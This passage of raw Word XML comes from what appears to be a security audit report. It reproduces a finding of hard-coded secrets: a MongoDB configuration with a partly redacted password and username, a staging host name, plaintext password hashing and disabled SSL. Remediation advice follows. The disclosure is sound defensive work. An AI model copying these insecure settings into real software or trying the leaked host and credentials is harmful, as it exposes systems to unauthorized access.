          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>development"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1115" w:val="left" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
          <w:tab w:pos="3320" w:val="left" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Dqn[.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="31"/>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color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>password_hash_algorithm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"plain"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>salt_position </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"disable"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="1"/>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color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>password_hash_field </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"password"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="31"/>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color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pool_size </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>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color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>salt_field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"salt"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>servers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"staging.whqu3.mongodb.net"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>ssl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>verify </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"verify_peer"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>topology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>connect_timeout_ms </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"20s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"adm[...]"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>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color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>srv_record </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to remove all hard-coded credentials, tokens and private keys from the affected repositories. Once that is done, the git history ought to be scrubbed from these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sensitive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>secrets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accomplished</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>utilizing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>BFG Repo-Cleaner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>87</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. It is advised to invalidate all identified credentials and generate new ones. Automated tools such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>GitGuardian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>88</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>TruffleHog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>89</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Git Secrets commit hooks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> should be then considered for inclusion in the development process. This will drastically reduce the potential for similar issues in the future, due to repositories being scanned for secrets as developers commit code as well as regularly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Regarding the removal of credentials from the source code, please note that while environment variables would be better than hard-coding secrets in the source code, these still have downsides and a dedicated secret management tool should be preferred</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>91</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Instead, applications should retrieve credentials from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>AWS Secrets Manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>92</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> or an equivalent secure vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>provides</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>as needed at runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>encrypts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>them</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>rest.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
